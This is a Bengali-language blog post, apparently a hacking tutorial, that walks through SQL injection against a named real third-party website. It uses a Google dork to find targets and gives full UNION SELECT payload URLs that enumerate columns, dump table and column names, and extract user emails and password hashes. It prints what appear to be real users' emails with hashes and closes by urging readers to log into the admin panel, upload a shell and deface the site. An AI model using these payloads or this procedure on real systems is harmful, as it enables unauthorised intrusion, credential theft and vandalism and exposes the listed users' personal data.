How to SQLi Injection web hacker

হ্যাকিং পদ্ধতি গুলোর মধ্যে সবচেয়ে কার্যকর পদ্ধতি হচ্ছে SQLi Injection.
এই পদ্ধতিতে হ্যাকিং এর জন্য প্রথমে dork ব্যবহার করে SQLi vulnerable সাইট  খুঁজে বের করতে হবে।
আপনি যেকোনো dork ব্যবহার করতে পারেন, আপনার পছন্দ মতো।
ধরুন আমরা index.php?id= এই Dork টি নিলাম।
এখন www.google.com এ গিয়ে উপরের Dork টি লিখে সার্চ  দিলে নিচের মত ফলাফল আসবে।
সার্চ ফলাফল থেকে যেকোনো একটি সাইট নিয়ে তা পরীক্ষা করবো যে তা SQLi vulnerable  কিনা।
মনেকরি,www.filmmakersjournal.co.uk/article.php?id=XX এই  সাইট টি নিলাম।
এখন সাইটটির vulnerabilities পরীক্ষার জন্য xx এর আগে অথবা পরে ‘ Sign টি দিয়ে  ওকে করলে যদি
“You have an syntax error in your SQL syntax.” এমন error দেয় তাহলে বুঝতে হবে  সাইট SQLi vulnerable.

এখন সাইটটির কলাম সংখ্যা বের করতে হবে। এজন্য লিখবো

http://www.filmmakersjournal.co.uk/article.php?id=4+order+by+1--
অর্থাৎ 4 এর পর শুধু order by 1 - - যোগ করবো। এখানে 1 হচ্ছে কলাম সংখ্যা।
(যারা মোবাইল থেকে করবেন তারা space এর বদলে + দিবেন)
যদি এতে কোন error না দেয় তবে লিখবো
http://www.filmmakersjournal.co.uk/article.php?id=4+order+by+2--  দিবো ।
এভাবে কলাম সংখ্যা বৃদ্ধি করে অর্থাৎ 1,2,3,3,4,5,6,7,8,9…………… দিয়ে দেখতে  থাকবো কোনটিতে error দেয়।
যখন order clause 500 বা Unknown Column 10 এমন error দিবে তখন থামবো।
ধরুন কলাম সংখ্যা 10 এ উপরের মত error দিলো তাহলে বুঝতে হবে এর কলাম সংখ্যা 9  .
কলাম সংখ্যা পেলাম। এবার বের করবো কোন কলামটি vulnerable.
এর জন্য 4 এর পর union select all ক্রমানুসারে কলাম সংখ্যা – লিখবো এবং 4 এর আগে  – sign টি দিবো। তাহলে লিঙ্কটি হবে
http://www.filmmakersjournal.co.uk/article.php?id=-4+union+all+select+1,2,3,4,5,6,7,8,9--
এখন ওয়েবপেজে কলাম সংখ্যার মধ্যে যে সংখ্যা গুলো দেখা যাবে তাই vulnerable  কলাম।
একাধিক সংখ্যা দেখালে যেটি deep বা bold বা color হবে সেটি নিবো।
ধরি উপরের সাইটটির ক্ষেত্রে কলাম সংখ্যা পেলাম 2 .
তাহলে 2 নম্বর কলামটির database version বের করবো।
তার জন্য লিখবো
http://www.filmmakersjournal.co.uk/article.php?id=-4+union+all+select+1,@@version,3,4,5,6,7,8,9--
অর্থাৎ শুধু মাত্র 2 এর জায়গায় @@version বা version() লিখবো।
এখন দেখা যাবে ওয়েবপেজ এর যেই জায়গায় 2 লিখা আসছিল সেখানে database version  (5.0.77-log) দেখাবে। যদি database version 5 হয় তাহলে continue  করব, অন্যথায় সাইটটি বাদ দিবো। কারন এই পদ্ধতিটি database version 5 এর জন্য।
ধরে নেই database version 5 পাওয়া গেছে।
এবার সাইটটির টেবিল সংখ্যা বের করবো তার জন্য লিখবো

http://www.filmmakersjournal.co.uk/article.php?id=-4+union+all+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9+from+

information_schema.tables+where+table_schema=database()--

ফলে যেইখানে database version লিখা আসছিলো, সেখানে টেবিল নাম আসবে নিচের  মত...

linkCategories,links,media,mediaCategories,mediaCategory_associations, news,pages,sponsors,users
এখান থেকে অনুমান করতে হবে কোন টেবিলটিতে ইউজার নাম এবং password থাকতে  পারে।
উপরের টেবিল গুলোর মধ্যে users টেবিলটি দেখে সহজেই বুঝা যায় যে users এর মধ্যে  username & password থাকতে পারে।

এখন users টেবিল নামকে explore করে কলাম নাম বের করবো।

NOTE : {সে ক্ষেত্রে Syntix  (group_concat(column_name)....+from+information_schema.columns+where+
table_name=0xusershex--) নিতে হবে এখানে আমরা শেষের দিকে 0xusershex এ  usershex  এর পরিবতে 7573657273 বসাব) কারন user এর hex code 7573657273}  এজন্য লিখবো

http://www.filmmakersjournal.co.uk/article.php?id=-4+union+all+select+1,group_concat%28column_name%29,3,4,5,6,7,8,9+

from+information_schema.columns+where+table_name=0x7573657273--
*** users এর হেক্স কোড বের করবো
www.string-functions.com/string-hex.aspx থেকে।***
এখন কলাম নাম পাবো নিচের মতো...
কলাম নাম থেকে username & password বের করতে লিখবো
http://www.filmmakersjournal.co.uk/article.php?id=-4+union+all+select+1%2Cgroup_concat%28id%2Cemail%2C0x3a%2Cpassword%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9+from+ যে টেবিল থেকে কলাম নাম পেয়েছি তার নাম  - -
এখন নিচের মতো  দেখাবে।5teej@redjackson.com:afbaae842fcae0cb963b34a793263c4b2daabe31,7jamesmarcustucker@hotmail.com:7dd15b628a5399cd88dec1d6a309ca8bc8e94e4f
ব্যস পেয়ে গেলেন username & password .
( password যদি Hash কোডে বের হয় তাহলে Hash decrypte করুন এখান থেকে।--->  http://pastebin.com/L87TaH1Z এই link এ কিছু  দরকারি Hash decrypte করার লিস্ট আছে ।)
Username & password দিয়ে সাইটটিতে লগইন করতে দরকার admin panel.
অনলাইনে অনেক Admin Finder পাওয়া যায় সেগুলা ও use করতে পারেন । ইচ্ছা  করলে  havij tool টা use করতে পারেন Admin Panel Finder হিসেবে । Havij For  Download All  version available here-->http://nishobdoblog.blogspot.com/2012/05/havij-115-advanced-sql-injection.htmlসাইটটির  এডমিন প্যানেল বের করুন ।
এডমিন প্যানেল পেয়ে গেলে লগইন করুন এবং সাইটে shell upload করে deface  করুন।
~শেল..

No comments:

Post a Comment